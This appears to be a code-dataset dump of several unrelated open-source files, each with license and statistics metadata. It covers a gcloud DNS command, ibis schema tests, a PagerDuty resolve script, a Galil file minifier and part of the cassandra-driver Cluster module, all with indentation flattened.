$ {command} my_zone --dns_name my.zone.com. --description "My zone!"
""",
}
@staticmethod
def Args(parser):
parser.add_argument('dns_zone',
metavar='ZONE_NAME',
help='Name of the managed-zone to be created.')
parser.add_argument(
'--dns-name',
required=True,
help='The DNS name suffix that will be managed with the created zone.')
parser.add_argument('--description',
required=True,
help='Short description for the managed-zone.')
@util.HandleHttpError
def Run(self, args):
dns = self.context['dns_client']
messages = self.context['dns_messages']
resources = self.context['dns_resources']
zone_ref = resources.Parse(args.dns_zone, collection='dns.managedZones')
zone = messages.ManagedZone(name=zone_ref.managedZone,
dnsName=util.AppendTrailingDot(args.dns_name),
description=args.description)
result = dns.managedZones.Create(
messages.DnsManagedZonesCreateRequest(managedZone=zone,
project=zone_ref.project))
log.CreatedResource(zone_ref)
return result
def Display(self, args, result):
list_printer.PrintResourceList('dns.managedZones', [result])
|
bsd-3-clause
| 7,825,775,985,124,091,000
| 34.231884
| 80
| 0.65364
| false
| 4.242583
| false
| false
| false
|
cpcloud/ibis
|
ibis/expr/tests/test_schema.py
|
1
|
4977
|
import ibis
from ibis.expr import datatypes as dt
def test_whole_schema():
customers = ibis.table(
[
('cid', 'int64'),
('mktsegment', 'string'),
(
'address',
(
'struct<city: string, street: string, '
'street_number: int32, zip: int16>'
),
),
('phone_numbers', 'array<string>'),
(
'orders',
"""array<struct<
oid: int64,
status: string,
totalprice: decimal(12, 2),
order_date: string,
items: array<struct<
iid: int64,
name: string,
price: decimal(12, 2),
discount_perc: decimal(12, 2),
shipdate: string
>>
>>""",
),
(
'web_visits',
(
'map<string, struct<user_agent: string, '
'client_ip: string, visit_date: string, '
'duration_ms: int32>>'
),
),
(
'support_calls',
(
'array<struct<agent_id: int64, '
'call_date: string, duration_ms: int64, '
'issue_resolved: boolean, '
'agent_comment: string>>'
),
),
],
name='customers',
)
expected = ibis.Schema.from_tuples(
[
('cid', dt.int64),
('mktsegment', dt.string),
(
'address',
dt.Struct.from_tuples(
[
('city', dt.string),
('street', dt.string),
('street_number', dt.int32),
('zip', dt.int16),
]
),
),
('phone_numbers', dt.Array(dt.string)),
(
'orders',
dt.Array(
dt.Struct.from_tuples(
[
('oid', dt.int64),
('status', dt.string),
('totalprice', dt.Decimal(12, 2)),
('order_date', dt.string),
(
'items',
dt.Array(
dt.Struct.from_tuples(
[
('iid', dt.int64),
('name', dt.string),
('price', dt.Decimal(12, 2)),
(
'discount_perc',
dt.Decimal(12, 2),
),
('shipdate', dt.string),
]
)
),
),
]
)
),
),
(
'web_visits',
dt.Map(
dt.string,
dt.Struct.from_tuples(
[
('user_agent', dt.string),
('client_ip', dt.string),
('visit_date', dt.string),
('duration_ms', dt.int32),
]
),
),
),
(
'support_calls',
dt.Array(
dt.Struct.from_tuples(
[
('agent_id', dt.int64),
('call_date', dt.string),
('duration_ms', dt.int64),
('issue_resolved', dt.boolean),
('agent_comment', dt.string),
]
)
),
),
]
)
assert customers.schema() == expected
def test_schema_subset():
s1 = ibis.schema([('a', dt.int64), ('b', dt.int32), ('c', dt.string)])
s2 = ibis.schema([('a', dt.int64), ('c', dt.string)])
assert s1 > s2
assert s2 < s1
assert s1 >= s2
assert s2 <= s1
def test_empty_schema():
schema = ibis.schema([])
result = repr(schema)
expected = """\
ibis.Schema {
}"""
assert result == expected
|
apache-2.0
| -8,713,466,511,553,539,000
| 31.960265
| 74
| 0.277275
| false
| 5.573348
| false
| false
| false
|
edunham/toys
|
pd/resolve.py
|
1
|
1132
|
#!/usr/bin/env python3
# based on example from https://github.com/PagerDuty/API_Python_Examples/tree/master/EVENTS_API_v2
import json
import requests
import os
import sys
ROUTING_KEY = os.environ['PAGERDUTY_SERVICE_KEY']
INCIDENT_KEY = sys.argv[1]
def resolve_incident():
# Triggers a PagerDuty incident without a previously generated incident key
# Uses Events V2 API - documentation: https://v2.developer.pagerduty.com/docs/send-an-event-events-api-v2
header = {
"Content-Type": "application/json"
}
payload = { # Payload is built with the least amount of fields required to trigger an incident
"routing_key": ROUTING_KEY,
"event_action": "resolve",
"dedup_key": INCIDENT_KEY
}
response = requests.post('https://events.pagerduty.com/v2/enqueue',
data=json.dumps(payload),
headers=header)
if response.json()["status"] == "success":
print('Incident Resolved ')
else:
print(response.text) # print error message if not successful
if __name__ == '__main__':
resolve_incident()
|
mit
| 1,053,160,661,838,398,100
| 28.789474
| 109
| 0.64576
| false
| 3.605096
| false
| false
| false
|
nditech/elections
|
apollo/locations/__init__.py
|
1
|
4175
|
from apollo.core import Service, cache
from apollo.locations.models import Sample, LocationType, Location
import unicodecsv
try:
from cStringIO import StringIO
except:
from StringIO import StringIO
class SamplesService(Service):
__model__ = Sample
class LocationTypesService(Service):
__model__ = LocationType
def root(self):
# a raw query is needed because querying 'normally'
# (i.e.: ancestors_ref=[]) will raise an exception
# about an invalid ObjectID
return self.find(__raw__={'ancestors_ref': []}).first()
class LocationsService(Service):
__model__ = Location
def root(self):
# a raw query is needed because querying 'normally'
# (i.e.: ancestors_ref=[]) will raise an exception
# about an invalid ObjectID
return self.find(__raw__={'ancestors_ref': []}).first()
@cache.memoize(timeout=86400)
def registered_voters_map(self):
'''
This method computes a map of location ids and the corresponding
number of registered voters and cache the result for a day.
'''
eligible_location_types = LocationTypesService().find(
has_registered_voters=True).scalar('name')
return {pk: rv for (pk, rv) in self.find(
location_type__in=eligible_location_types).scalar(
'pk', 'registered_voters')}
def export_list(self, queryset):
headers = []
location_types = list(LocationTypesService().find().order_by(
'ancestors_ref'))
for location_type in location_types:
location_name = location_type.name.upper()
headers.append('{}_N'.format(location_name))
headers.append('{}_ID'.format(location_name))
if location_type.has_political_code:
headers.append('{}_PCODE'.format(location_name))
if location_type.has_registered_voters:
headers.append('{}_RV'.format(location_name))
for metafield in location_type.metafields:
headers.append('{}_{}'.format(
location_name, metafield.upper()
))
output = StringIO()
writer = unicodecsv.writer(output, encoding='utf-8')
writer.writerow([unicode(i) for i in headers])
yield output.getvalue()
output.close()
if queryset.count() < 1:
yield
else:
locations = queryset
locations = locations.order_by('code')
for location in locations:
record = []
for location_type in location_types:
try:
this_location = filter(
lambda l: l.location_type == location_type.name,
location.ancestors_ref
).pop()
except IndexError:
if location.location_type == location_type.name:
this_location = location
else:
this_location = None
record.append(this_location.name or ''
if this_location else '')
record.append(this_location.code or ''
if this_location else '')
if location_type.has_political_code:
record.append(this_location.political_code or ''
if this_location else '')
if location_type.has_registered_voters:
record.append(this_location.registered_voters or ''
if this_location else '')
for metafield in location_type.metafields:
record.append(getattr(this_location, metafield, '')
if this_location else '')
output = StringIO()
writer = unicodecsv.writer(output, encoding='utf-8')
writer.writerow([unicode(i) for i in record])
yield output.getvalue()
output.close()
|
gpl-3.0
| 3,217,432,549,554,864,600
| 39.144231
| 76
| 0.535329
| false
| 4.832176
| false
| false
| false
|
mehdy/click-pug
|
tehpug.py
|
1
|
2029
|
# coding: utf-8
#
# ==========================================
# Developed by Mehdy Khoshnoody =
# Contact @ mehdy.khoshnoody@gmail.com =
# More info @ http://mehdy.net =
# ==========================================
#
__author__ = 'mehdy'
import click
def version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo('version 1.0')
ctx.exit()
def validate(ctx, param, value):
if value < 19:
click.echo('You are not authoriazed to attend. you must be at least 18.')
ctx.exit()
else:
return
@click.group()
@click.option('--version', callback=version, expose_value=False, is_flag=True, is_eager=True)
def main():
'''
This a detail section for the app
'''
pass
@main.command()
@click.option('--name', '-n', default='tehpug', type=click.STRING, help='enter your name')
@click.option('--age', '-a', default=15, callback=validate, help='enter your age')
@click.option('--attend/--not-attend', default=False)
@click.argument('out', type=click.File('w'), required=False)
@click.option('--group', type=click.Choice(['flask','django','click']), default='flask')
def pug(name, age, attend, out, group):
'''
this a help message for pug
'''
if out:
if not attend:
click.echo('Why???', out)
click.echo('hello %s, you are %s years old.\nwelcome to PUG' %(name, age), out)
click.echo('you are member of %s subgroup in pug.' %group, out)
else:
if not attend:
click.echo('Why???')
click.echo('hello %s, you are %s years old.\nwelcome to PUG' % (name, age))
click.echo('you are member of %s subgroup in pug.' % group)
@main.command()
@click.option('--name', '-n', default='tehpug', type=click.STRING, help='enter your name')
@click.option('--age', '-a', default=15, help='enter your age')
def lug(name, age):
'''
and a help message for lug
'''
click.echo('hello %s, you are %s years old.\nwelcome to LUG' %(name, age))
|
gpl-2.0
| -5,895,680,206,538,094,000
| 31.222222
| 93
| 0.580089
| false
| 3.277868
| false
| false
| false
|
duelafn/python-galil-apci
|
galil_apci/file.py
|
1
|
15100
|
# -*- coding: utf-8 -*-
"""Simple galil file templating and minification
Preforms useful actions on galil encoder files.
- Substitution of template variables (using jinja2)
- Whitespace trimming and minification by command packing
"""
# Author: Dean Serenevy <deans@apcisystems.com>
# This software is Copyright (c) 2013 APCI, LLC.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, absolute_import, print_function
import re
import logging
logger = logging.getLogger(__name__)
import galil_apci
import jinja2
import collections
from jinja2_apci import RequireExtension, RaiseExtension
import math
axis2idx = { "A": 0, "B": 1, "C": 2, "D": 3,
"E": 4, "F": 5, "G": 6, "H": 7,
"X": 0, "Y": 1, "Z": 2, "W": 3
}
def param_list(params):
"""
Produces string appropriate for a galil parameter list for a set of axes.
Setting a number of values at once sometimes requires issuing a command
with a single positional list of values for each axis. For example::
JG val1,val2,...
This can be difficult if the axis numbers are parameters. This function
will produce a list from a dictionary of axes (numerical or letters)::
JG{{ param_list({ "A": 60*4096, "B": 60*4096 }) }}
JG{{ param_list({ "0": 60*4096, "1": 60*4096 }) }}
JG{{ param_list({ primary.axis: "^a*" ~ primary.counts, secondary.axis: "^a*" ~ secondary.counts }) }}
"""
a = [""] * 8
for (k, v) in params.iteritems():
a[int(axis2idx.get(k, k))] = str(v)
i = 7
while i >= 0:
if a[i] == '':
i -= 1
else:
break
if i < 0:
raise Exception("No values in the parameter list: {}".format(str(params)))
return ",".join(a[0:i+1])
def build_commander(fmt):
"""
Convenience method which constructs list of formatted commands when
passed a list of arguments.
E.g.,::
HX = build_commander("HX{}")
print( HX(1,2,3) ) # prints HX1;HX2;HX3
"""
def cmd(*args):
return ";".join([ fmt.format(x) for x in args ])
return cmd
def sin(theta):
"""sin function taking degree arguments"""
return math.sin(math.pi * theta/180)
def asin(h):
"""asin function returning degrees"""
return 180 * math.asin(h) / math.pi
def cos(theta):
"""cos function taking degree arguments"""
return math.cos(math.pi * theta/180)
def acos(h):
"""acos function returning degrees"""
return 180 * math.acos(h) / math.pi
class GalilFile(object):
@classmethod
def add_globals(cls, g):
g["string_to_galil_hex"] = galil_apci.Galil.string_to_galil_hex
g["galil_hex_to_string"] = galil_apci.Galil.galil_hex_to_string
g["galil_hex_to_binary"] = galil_apci.Galil.galil_hex_to_binary
g["round_galil"] = galil_apci.Galil.round
g["axis2idx"] = axis2idx
g["param_list"] = param_list
g["HX"] = build_commander("HX{}")
g["SB"] = build_commander("SB{}")
g["CB"] = build_commander("CB{}")
g["max"] = max
g["min"] = min
g["int"] = int
g["sin"] = sin
g["asin"] = asin
g["cos"] = cos
g["acos"] = acos
def __init__(self, path=None, package=None, line_length=79):
"""
@param path: If a path (array of directories) is provided, it will
be prepended to the template search path. The default path is
the "gal" folder in the apci module directory.
@param line_length: Galil maximum line length. 79 for most boards,
but some are capped at 39.
"""
self.line_length = line_length
loaders = []
if path:
loaders.append(jinja2.FileSystemLoader(path, encoding='utf-8'))
if package:
loaders.append(jinja2.PackageLoader(package, 'gal', encoding='utf-8'))
def finalize(value):
if value is None:
print("Use of undefined value in template!")
return "None"
else:
return value
self.env = jinja2.Environment(
extensions=[RequireExtension, RaiseExtension],
loader=jinja2.ChoiceLoader(loaders),
undefined=jinja2.StrictUndefined,
finalize=finalize,
)
GalilFile.add_globals(self.env.globals)
def load(self, name, context):
"""Renders and minifies a template"""
return self.minify( self.render(name, context) )
def lint(self, content, warnings=False):
"""
Performs a lint check on the galil code
- long lines, too-long strings
- duplicate labels / forgotten C{JS}, C{JS} or C{JP} to non-existant labels
- C{_JS} or C{()} used in sub argument, inconsistent sub arity
- Double equals ("=="), Not equals ("!=")
- presence of "None" anywhere in the code
- [warning] unused labels
NOT IMPLEMENTED / TODO:
- long variable names
- external JP targets
- C{SHA}, C{_GRB}, ... (axes outside of braces, should be C{SHE{lb}E{lb}AE{rb}E{rb}} and C{_GRE{lb}E{lb}BE{rb}E{rb}})
- uninitialized variables (variables not initialized in any #xxINIT)
"""
content = self.minify(content)
errors = []
# WARNING: Any trailing semicolon/EOL checks need to be zero-width assertions
p_sub_def = re.compile(r"(?:^|;)(#[a-zA-Z0-9_]{1,7})")
p_sub_arg = re.compile(r"""
(?:^|;)
(?:J[SP]|XQ) (\#[a-zA-Z0-9_]{1,7}) # jump name
((?:\(.*?\))?) # optional arguments
(?= ; | $ # endl
| , \( # complex condition
| , (?:\d+|\^[a-h]|\w{1,8}) (?:;|$) # thread number
)
""", re.X)
p_bad_ops = re.compile(r"(?:==|!=)")
p_JS = re.compile(r"_JS")
p_if_js = re.compile(r"(?:^|;)IF\([^;\n]+\)[;\n](J[SP]#[a-zA-Z]+)[^;\n]*[;\n]ENDIF", re.M)
# Dangerous to have any calculation in an argument. Only want variables.
# warning: won't catch @ABS[foo]
p_danger_arg = re.compile(r"(?:.(?:\(|\)).|[^a-zA-Z0-9.,@\[\]_\(\)\^\&\"\-]|(?<![\(,])\-)")
pc_MG = re.compile(r"^MG")
subs = set()
sub_line = {}
sub_arity = {}
sub_neg1_dflt = set(("#ok", "#error"))
AUTO_subs = set(["#AUTO", "#MCTIME", "#AMPERR", "#AUTOERR", "#POSERR", "#CMDERR"])
JSP_sub = set()
JSP_line = collections.defaultdict(list)
if warnings:
for jump in p_if_js.findall(content):
errors.append( "IF(...);{} better written as {},(...)".format(jump, jump) )
lineno = 0
for line in content.split("\n"):
lineno += 1
# presence of None
if "None" in line:
errors.append( "line {}, Contains 'None', check template vars: {}".format(lineno, line) )
# long lines
if len(line) > self.line_length:
errors.append( "line {}, Line too long: {}".format(lineno, line) )
# Bad operators
if p_bad_ops.search(line):
errors.append( "line {}, bad operator: {}".format(lineno, line) )
# for duplicate labels
for name in p_sub_def.findall(line):
if name in subs:
errors.append( "line {}, Duplicate label: {}".format(lineno, name) )
else:
subs.add(name)
sub_line[name] = lineno
# examine subroutine arguments (JS, JP)
# also for unused labels and jumps to non-existant labels
for name, arg in p_sub_arg.findall(line):
# Note: arg includes "()"
JSP_sub.add(name)
JSP_line[name].append(lineno)
args = [] if len(arg) < 3 else arg.split(',')
if name in sub_neg1_dflt and arg == "(-1)":
# Make exception for #ok and #error
pass
elif name in sub_arity:
if len(args) != sub_arity[name]:
errors.append( "line {}, inconsistent sub arity for {}. Was {} now {}".format(lineno, name, sub_arity[name], len(args)) )
else:
sub_arity[name] = len(args)
if p_JS.search(arg):
errors.append( "line {}, _JS used in subroutine argument: {}".format(lineno, line) )
if p_danger_arg.search(arg):
errors.append( "line {}, Dangerous value (calculation) used in argument: {}".format(lineno, line) )
for cmd in line.split(";"):
# long strings
if not pc_MG.search(cmd):
strings = cmd.split('"')
for idx in (x for x in xrange(1, len(strings), 2) if len(strings[x]) > 5):
errors.append( "line {}, Long string '{}' in command: {}".format(lineno, strings[idx], cmd) )
# jumps to non-existant labels
for sub in JSP_sub - subs:
errors.append( "line(s) {}, J[SP]{} found but label {} not defined".format(JSP_line[sub], sub, sub) )
if warnings:
# unused labels
for sub in subs - JSP_sub - AUTO_subs:
errors.append( "line {}, Label {} defined but never used".format(sub_line[sub], sub) )
return errors
def minify(self, content):
"""
Performs minification on a galil file. Actions performed:
- Strips all comments
- trims space after semicolon and before/after various ops (" = ", "IF (...)")
- Merges "simple" lines (up to line_length)
"""
lines = []
double_semi = re.compile(r';(\s*)(?=;)')
line_end_semi = re.compile(r';$')
# Comments: ', NO, REM. Do NOT need to check for word boundaries ("NOTE" is a comment)
#
# WARNING: This is INCORRECT! In galil a semicolon ends a comment
# - this is crazy so I explicitly choose to have a comment kill
# the rest of the line
comment = re.compile(r"(?:^|;)\s*(?:'|NO|REM).*")
# Operators with wrapped space. Match will be replaced with \1.
operator_spaces = re.compile(r"\s*([,;=\+\-*/%<>\(\)\[\]&|]|<>|>=|<=)\s*")
# A line containing just a label
label_line = re.compile(r"^#[a-zA-Z0-9]{1,7}$")
# A line that starts with a label
label_start = re.compile(r"^#")
# Joinable Lines (combinations of the following):
# - Simple Assignments: assignments to our variables or arrays (start with lower)
# - ENDIF, ELSE
# NOTE: a joinable line never ends in a semicolon - this provides a way to force a line break
joinable_line = re.compile(r"""
^(?: (?:^|;) \s*
(?:
(?:[~^][a-z]|[a-z][a-zA-Z0-9]{0,7}(?:\[[^\];]+\])?)
\s* = \s* [^\;]+
| ENDIF
| ELSE
)
\s*)+$
""", re.X)
_lines1 = []
# Start with simple compaction (removes extra garbage and makes
# later length calculations more reliable
for line in content.split("\n"):
line = re.sub(comment, '', line)
line = re.sub(operator_spaces, '\\1', line)
line = line.strip()
if len(line):
_lines1.append(line)
# The more advanced stuff: line merging, etc
i = 0
_lines2 = []
while i < len(_lines1):
line = _lines1[i]
while ( i < len(_lines1) - 1
and joinable_line.match(_lines1[i+1])
and self.line_length > len(line + ";" + _lines1[i+1])
):
line = line + ";" + _lines1[i+1]
i += 1
if len(line):
_lines2.append(line)
i += 1
# Squash label into next line (assuming it isn't itself a label)
i = 0
while i < len(_lines2):
line = _lines2[i]
if ( i < len(_lines2) - 1
and label_line.match(line)
and not label_start.match(_lines2[i+1])
and self.line_length > len(line + ";" + _lines2[i+1])
):
line = line + ";" + _lines2[i+1]
i += 1
if ( i < len(_lines2) - 1
and _lines2[i+1] == 'EN'
and self.line_length > len(line + ";" + _lines2[i+1])
):
line = line + ";" + _lines2[i+1]
i += 1
# double semicolons confuse galil but are somewhat easy to
# introduce when templating and doing strange minification.
# Strip them out again just to be sure:
line = line_end_semi.sub('',(double_semi.sub(r'\1',line)))
if len(line):
lines.append(line)
i += 1
for i, line in enumerate(lines):
if (len(line) > self.line_length):
logger.error("Long line '%s' in minified galil output", line)
return "\n".join(lines)
def trim(self, content):
"""
Performs whitespace trimming on a galil file.
"""
lines = []
for line in content.split("\n"):
line = line.strip()
if len(line):
lines.append(line)
return "\n".join(lines)
def render(self, name, context):
"""
Renders a galil template file (substitutes variables and expands
inclusions), but does not perform whitespace trimming or
minification.
"""
content = self.env.get_template(name).render(context)
# double semicolons confuse galil but are somewhat easy to
# introduce when templating. Strip them out here:
return re.sub(r';(\s*)(?=;)', r'\1', content).encode('utf-8')
def get_template(self, name):
"""
Gets the jinja template object for a template file.
"""
return self.env.get_template(name)
|
lgpl-3.0
| 4,899,683,945,039,046,000
| 34.6974
| 145
| 0.515762
| false
| 3.747828
| false
| false
| false
|
kishkaru/python-driver
|
cassandra/cluster.py
|
1
|
149094
|
# Copyright 2013-2016 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module houses the main classes you will interact with,
:class:`.Cluster` and :class:`.Session`.
"""
from __future__ import absolute_import
import atexit
from collections import defaultdict, Mapping
from concurrent.futures import ThreadPoolExecutor
import logging
from random import random
import socket
import sys
import time
from threading import Lock, RLock, Thread, Event
import six
from six.moves import range
from six.moves import queue as Queue
import weakref
from weakref import WeakValueDictionary
try:
from weakref import WeakSet
except ImportError:
from cassandra.util import WeakSet # NOQA
from functools import partial, wraps
from itertools import groupby, count
from cassandra import (ConsistencyLevel, AuthenticationFailed,
OperationTimedOut, UnsupportedOperation,
SchemaTargetType, DriverException)
from cassandra.connection import (ConnectionException, ConnectionShutdown,
ConnectionHeartbeat, ProtocolVersionUnsupported)
from cassandra.cqltypes import UserType
from cassandra.encoder import Encoder
from cassandra.protocol import (QueryMessage, ResultMessage,
ErrorMessage, ReadTimeoutErrorMessage,
WriteTimeoutErrorMessage,
UnavailableErrorMessage,
OverloadedErrorMessage,
PrepareMessage, ExecuteMessage,
PreparedQueryNotFound,
IsBootstrappingErrorMessage,
BatchMessage, RESULT_KIND_PREPARED,
RESULT_KIND_SET_KEYSPACE, RESULT_KIND_ROWS,
RESULT_KIND_SCHEMA_CHANGE, MIN_SUPPORTED_VERSION,
ProtocolHandler)
from cassandra.metadata import Metadata, protect_name, murmur3
from cassandra.policies import (TokenAwarePolicy, DCAwareRoundRobinPolicy, SimpleConvictionPolicy,
ExponentialReconnectionPolicy, HostDistance,
RetryPolicy, IdentityTranslator)
from cassandra.pool import (Host, _ReconnectionHandler, _HostReconnectionHandler,
HostConnectionPool, HostConnection,
NoConnectionsAvailable)
from cassandra.query import (SimpleStatement, PreparedStatement, BoundStatement,
BatchStatement, bind_params, QueryTrace,
named_tuple_factory, dict_factory, tuple_factory, FETCH_SIZE_UNSET)
def _is_eventlet_monkey_patched():
if 'eventlet.patcher' not in sys.modules:
return False
import eventlet.patcher
return eventlet.patcher.is_monkey_patched('socket')
def _is_gevent_monkey_patched():
if 'gevent.monkey' not in sys.modules:
return False
import gevent.socket
return socket.socket is gevent.socket.socket
# default to gevent when we are monkey patched with gevent, eventlet when
# monkey patched with eventlet, otherwise if libev is available, use that as
# the default because it's fastest. Otherwise, use asyncore.
if _is_gevent_monkey_patched():
from cassandra.io.geventreactor import GeventConnection as DefaultConnection
elif _is_eventlet_monkey_patched():
from cassandra.io.eventletreactor import EventletConnection as DefaultConnection
else:
try:
from cassandra.io.libevreactor import LibevConnection as DefaultConnection # NOQA
except ImportError:
from cassandra.io.asyncorereactor import AsyncoreConnection as DefaultConnection # NOQA
# Forces load of utf8 encoding module to avoid deadlock that occurs
# if code that is being imported tries to import the module in a seperate
# thread.
# See http://bugs.python.org/issue10923
"".encode('utf8')
log = logging.getLogger(__name__)
DEFAULT_MIN_REQUESTS = 5
DEFAULT_MAX_REQUESTS = 100
DEFAULT_MIN_CONNECTIONS_PER_LOCAL_HOST = 2
DEFAULT_MAX_CONNECTIONS_PER_LOCAL_HOST = 8
DEFAULT_MIN_CONNECTIONS_PER_REMOTE_HOST = 1
DEFAULT_MAX_CONNECTIONS_PER_REMOTE_HOST = 2
_NOT_SET = object()
class NoHostAvailable(Exception):
"""
Raised when an operation is attempted but all connections are
busy, defunct, closed, or resulted in errors when used.
"""
errors = None
"""
A map of the form ``{ip: exception}`` which details the particular
Exception that was caught for each host the operation was attempted
against.
"""
def __init__(self, message, errors):
Exception.__init__(self, message, errors)
self.errors = errors
def _future_completed(future):
""" Helper for run_in_executor() """
exc = future.exception()
if exc:
log.debug("Failed to run task on executor", exc_info=exc)
def run_in_executor(f):
"""
A decorator to run the given method in the ThreadPoolExecutor.
"""
@wraps(f)
def new_f(self, *args, **kwargs):
if self.is_shutdown:
return
try:
future = self.executor.submit(f, self, *args, **kwargs)
future.add_done_callback(_future_completed)
except Exception:
log.exception("Failed to submit task to executor")
return new_f
_clusters_for_shutdown = set()
def _register_cluster_shutdown(cluster):
_clusters_for_shutdown.add(cluster)
def _discard_cluster_shutdown(cluster):
_clusters_for_shutdown.discard(cluster)
def _shutdown_clusters():
clusters = _clusters_for_shutdown.copy() # copy because shutdown modifies the global set "discard"
for cluster in clusters:
cluster.shutdown()
atexit.register(_shutdown_clusters)
# murmur3 implementation required for TokenAware is only available for CPython
import platform
if platform.python_implementation() == 'CPython':
def default_lbp_factory():
if murmur3 is not None:
return TokenAwarePolicy(DCAwareRoundRobinPolicy())
return DCAwareRoundRobinPolicy()
else:
def default_lbp_factory():
return DCAwareRoundRobinPolicy()
class Cluster(object):
"""
The main class to use when interacting with a Cassandra cluster.
Typically, one instance of this class will be created for each
separate Cassandra cluster that your application interacts with.
Example usage::
>>> from cassandra.cluster import Cluster
>>> cluster = Cluster(['192.168.1.1', '192.168.1.2'])
>>> session = cluster.connect()
>>> session.execute("CREATE KEYSPACE ...")
>>> ...
>>> cluster.shutdown()
``Cluster`` and ``Session`` also provide context management functions
which implicitly handle shutdown when leaving scope.
"""
contact_points = ['127.0.0.1']
"""
The list of contact points to try connecting for cluster discovery.
Defaults to loopback interface.
Note: When using :class:`.DCAwareLoadBalancingPolicy` with no explicit
local_dc set (as is the default), the DC is chosen from an arbitrary
host in contact_points. In this case, contact_points should contain
only nodes from a single, local DC.
"""
port = 9042
"""
The server-side port to open connections to. Defaults to 9042.
"""
cql_version = None
"""
If a specific version of CQL should be used, this may be set to that
string version. Otherwise, the highest CQL version supported by the
server will be automatically used.
"""
protocol_version = 4
"""
The maximum version of the native protocol to use.
The driver will automatically downgrade version based on a negotiation with
the server, but it is most efficient to set this to the maximum supported
by your version of Cassandra. Setting this will also prevent conflicting
versions negotiated if your cluster is upgraded.
Version 2 of the native protocol adds support for lightweight transactions,
batch operations, and automatic query paging. The v2 protocol is
supported by Cassandra 2.0+.
Version 3 of the native protocol adds support for protocol-level
client-side timestamps (see :attr:`.Session.use_client_timestamp`),
serial consistency levels for :class:`~.BatchStatement`, and an
improved connection pool.
Version 4 of the native protocol adds a number of new types, server warnings,
new failure messages, and custom payloads. Details in the
`project docs <https://github.com/apache/cassandra/blob/trunk/doc/native_protocol_v4.spec>`_
The following table describes the native protocol versions that
are supported by each version of Cassandra:
+-------------------+-------------------+
| Cassandra Version | Protocol Versions |
+===================+===================+
| 1.2 | 1 |
+-------------------+-------------------+
| 2.0 | 1, 2 |
+-------------------+-------------------+
| 2.1 | 1, 2, 3 |
+-------------------+-------------------+
| 2.2 | 1, 2, 3, 4 |
+-------------------+-------------------+
"""
compression = True
"""
Controls compression for communications between the driver and Cassandra.
If left as the default of :const:`True`, either lz4 or snappy compression
may be used, depending on what is supported by both the driver
and Cassandra. If both are fully supported, lz4 will be preferred.
You may also set this to 'snappy' or 'lz4' to request that specific
compression type.
Setting this to :const:`False` disables compression.
"""
_auth_provider = None
_auth_provider_callable = None
@property
def auth_provider(self):
"""
When :attr:`~.Cluster.protocol_version` is 2 or higher, this should
be an instance of a subclass of :class:`~cassandra.auth.AuthProvider`,
such as :class:`~.PlainTextAuthProvider`.
When :attr:`~.Cluster.protocol_version` is 1, this should be
a function that accepts one argument, the IP address of a node,
and returns a dict of credentials for that node.
When not using authentication, this should be left as :const:`None`.
"""
return self._auth_provider
@auth_provider.setter # noqa
def auth_provider(self, value):
if not value:
self._auth_provider = value
return
try:
self._auth_provider_callable = value.new_authenticator
except AttributeError:
if self.protocol_version > 1:
raise TypeError("auth_provider must implement the cassandra.auth.AuthProvider "
"interface when protocol_version >= 2")
elif not callable(value):
raise TypeError("auth_provider must be callable when protocol_version == 1")
self._auth_provider_callable = value
self._auth_provider = value
load_balancing_policy = None
"""
An instance of :class:`.policies.LoadBalancingPolicy` or
one of its subclasses.
.. versionchanged:: 2.6.0
Defaults to :class:`~.TokenAwarePolicy` (:class:`~.DCAwareRoundRobinPolicy`).
when using CPython (where the murmur3 extension is available). :class:`~.DCAwareRoundRobinPolicy`
otherwise. Default local DC will be chosen from contact points.
**Please see** :class:`~.DCAwareRoundRobinPolicy` **for a discussion on default behavior with respect to
DC locality and remote nodes.**
"""
reconnection_policy = ExponentialReconnectionPolicy(1.0, 600.0)
"""
An instance of :class:`.policies.ReconnectionPolicy`. Defaults to an instance
of :class:`.ExponentialReconnectionPolicy` with a base delay of one second and
a max delay of ten minutes.
"""
default_retry_policy = RetryPolicy()
"""
A default :class:`.policies.RetryPolicy` instance to use for all
:class:`.Statement` objects which do not have a :attr:`~.Statement.retry_policy`
explicitly set.
"""
conviction_policy_factory = SimpleConvictionPolicy
"""
A factory function which creates instances of
:class:`.policies.ConvictionPolicy`. Defaults to
:class:`.policies.SimpleConvictionPolicy`.
"""
address_translator = IdentityTranslator()
"""
:class:`.policies.AddressTranslator` instance to be used in translating server node addresses
to driver connection addresses.
"""
connect_to_remote_hosts = True
"""
If left as :const:`True`, hosts that are considered :attr:`~.HostDistance.REMOTE`
by the :attr:`~.Cluster.load_balancing_policy` will have a connection
opened to them. Otherwise, they will not have a connection opened to them.
Note that the default load balancing policy ignores remote hosts by default.
.. versionadded:: 2.1.0
"""
metrics_enabled = False
"""
Whether or not metric collection is enabled. If enabled, :attr:`.metrics`
will be an instance of :class:`~cassandra.metrics.Metrics`.
"""
metrics = None
"""
An instance of :class:`cassandra.metrics.Metrics` if :attr:`.metrics_enabled` is
:const:`True`, else :const:`None`.
"""
ssl_options = None
"""
A optional dict which will be used as kwargs for ``ssl.wrap_socket()``
when new sockets are created. This should be used when client encryption
is enabled in Cassandra.
By default, a ``ca_certs`` value should be supplied (the value should be
a string pointing to the location of the CA certs file), and you probably
want to specify ``ssl_version`` as ``ssl.PROTOCOL_TLSv1`` to match
Cassandra's default protocol.
.. versionchanged:: 3.3.0
In addition to ``wrap_socket`` kwargs, clients may also specify ``'check_hostname': True`` to verify the cert hostname
as outlined in RFC 2818 and RFC 6125. Note that this requires the certificate to be transferred, so
should almost always require the option ``'cert_reqs': ssl.CERT_REQUIRED``. Note also that this functionality was not built into
Python standard library until (2.7.9, 3.2). To enable this mechanism in earlier versions, patch ``ssl.match_hostname``
